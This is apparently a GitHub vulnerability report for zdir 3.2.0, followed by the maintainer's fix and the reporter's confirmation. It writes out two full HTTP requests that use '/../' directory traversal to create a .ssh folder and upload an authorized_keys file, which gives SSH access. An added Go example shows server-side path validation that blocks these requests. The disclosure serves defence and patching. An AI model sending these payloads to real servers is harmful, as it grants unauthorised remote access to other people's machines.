File upload ssh authorized_keys causes RCE #90

Closed
yuyan-sec opened this issue Jan 10, 2023 · 3 comments
Labels
bug Something isn't working

Comments

@yuyan-sec

The steps to reproduce:

zdir version: 3.2.0

git clone https://github.com/helloxz/zdir

go run main.go init

modify file: /zdir/data/config/config.ini

public_path=data/public

start

go run main.go start

Viewing the routes, the interface requires login credentials.

Entering the controller.Mkdir method, the parameters submitted by the POST request are name and path.

Entering the !V_dir method, we find that it only judges whether the passed path is a folder.

This creates a .ssh directory using directory traversal:

POST /api/dir/create HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 28
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
X-Token: 433a01baeaa6c37ef46f21621cc06f95
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: application/json, text/plain, */*
X-Cid: bPlNFG
sec-ch-ua-platform: "Linux"
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

path=/../../../../&name=.ssh


Entering the controller.Upload method, you can specify the upload path.

There is a loophole in the regex that determines whether the path is legal, and you can use /../ to bypass it.

It determines whether the folder exists, and terminates execution if it does not exist. So use the above directory traversal to create a folder, and then upload the file without renaming it.

POST /api/upload HTTP/1.1
Host: 127.0.0.1:6080
Content-Length: 897
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="96"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqjo68lEJ6LlJ8zdA
X-Token: 433a01baeaa6c37ef46f21621cc06f95
X-Cid: bPlNFG
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
sec-ch-ua-platform: "Linux"
Accept: */*
Origin: http://127.0.0.1:6080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:6080/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: USERNAME=admin; CID=bPlNFG; TOKEN=433a01baeaa6c37ef46f21621cc06f95
Connection: close

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="path"

/../../../../../../home/kali/.ssh
------WebKitFormBoundaryqjo68lEJ6LlJ8zdA
Content-Disposition: form-data; name="file"; filename="authorized_keys"
Content-Type: text/plain

ssh-rsa

------WebKitFormBoundaryqjo68lEJ6LlJ8zdA--

Generate an SSH public key for upload.

Then you can use ssh to connect to the server.
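As an added, defender-side illustration (this is example code, not zdir's code and not the fix in commit 42c1060): the root cause in the report above is that the path check is textual, a regex looking for the traversal string, rather than a check on where the path actually resolves. The Go program below normalizes the user-supplied path against the configured public directory and refuses any request whose resolved location lies outside it, and separately rejects a directory name or uploaded filename that carries a path separator. The base directory /srv/zdir/data/public, the function names SafeJoin, SafeName and ResolveEntry, and the sample requests are constructed for this example; the two rejected inputs are the mkdir and upload payloads shown in the report.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// PublicBase is a constructed stand-in for public_path from config.ini.
const PublicBase = "/srv/zdir/data/public"

var (
	ErrEscapesBase = errors.New("path escapes the public directory")
	ErrBadName     = errors.New("name contains a path separator or is a dot entry")
)

// SafeJoin resolves userPath against base and rejects any result that would
// lie outside base. The decision is made on the cleaned, joined path, not on
// the raw string, so "/../", "a/../../b" and similar forms are all caught by
// the same rule instead of by a pattern match.
func SafeJoin(base, userPath string) (string, error) {
	if !filepath.IsAbs(base) {
		return "", fmt.Errorf("base %q must be absolute", base)
	}
	base = filepath.Clean(base)
	// Join appends userPath (even when it starts with "/") and cleans the result.
	target := filepath.Join(base, userPath)
	rel, err := filepath.Rel(base, target)
	if err != nil {
		return "", err
	}
	// rel is ".." or begins with "../" exactly when target is above base.
	// A name like "..data" is a valid entry and is not matched here.
	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%w: %q resolves to %s", ErrEscapesBase, userPath, target)
	}
	return target, nil
}

// SafeName validates a single path component (the mkdir "name" or an uploaded
// filename) so it cannot add traversal on top of an already-validated parent.
func SafeName(name string) (string, error) {
	if name == "" || name == "." || name == ".." || strings.ContainsAny(name, `/\`) {
		return "", fmt.Errorf("%w: %q", ErrBadName, name)
	}
	return name, nil
}

// ResolveEntry mirrors the shape of both endpoints in the report: a parent
// path plus a name. It returns the final location the server would write to,
// or an error when the request must be refused.
func ResolveEntry(base, parent, name string) (string, error) {
	dir, err := SafeJoin(base, parent)
	if err != nil {
		return "", err
	}
	clean, err := SafeName(name)
	if err != nil {
		return "", err
	}
	return filepath.Join(dir, clean), nil
}

func main() {
	// Constructed requests: the first two are the payloads from the report.
	cases := []struct{ parent, name string }{
		{"/../../../../", ".ssh"},
		{"/../../../../../../home/kali/.ssh", "authorized_keys"},
		{"docs/2023", "report.pdf"},
		{"docs", "../notes.txt"},
	}
	for _, c := range cases {
		if p, err := ResolveEntry(PublicBase, c.parent, c.name); err != nil {
			fmt.Printf("REJECT path=%q name=%q: %v\n", c.parent, c.name, err)
		} else {
			fmt.Printf("ALLOW  -> %s\n", p)
		}
	}
}
```

Running it prints REJECT for the two traversal payloads and for the name containing a separator, and ALLOW with the resolved path for the legitimate request. The design point is that the allow/deny decision depends only on the resolved result relative to the base, so new encodings of the traversal string do not need new regex rules; logging the rejected raw input alongside the resolved target also gives the operator a clear signal to alert on.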

@helloxz
Owner

helloxz commented Jan 10, 2023

Thanks for your feedback, I have updated the code in the dev branch to fix this vulnerability and you can verify it again.

This is the change: 42c1060

I will merge the code and fix the vulnerability in a subsequent release. Thanks again.

@helloxz helloxz added the bug Something isn't working label Jan 10, 2023
@yuyan-sec
Author

With the V_fpath function it can no longer be bypassed, because it is no longer possible to jump out of the directory.

@helloxz
Copy link
Owner

helloxz commented Jan 11, 2023

OK, thanks for your feedback. This issue is now closed.

@helloxz helloxz closed this as completed Jan 11, 2023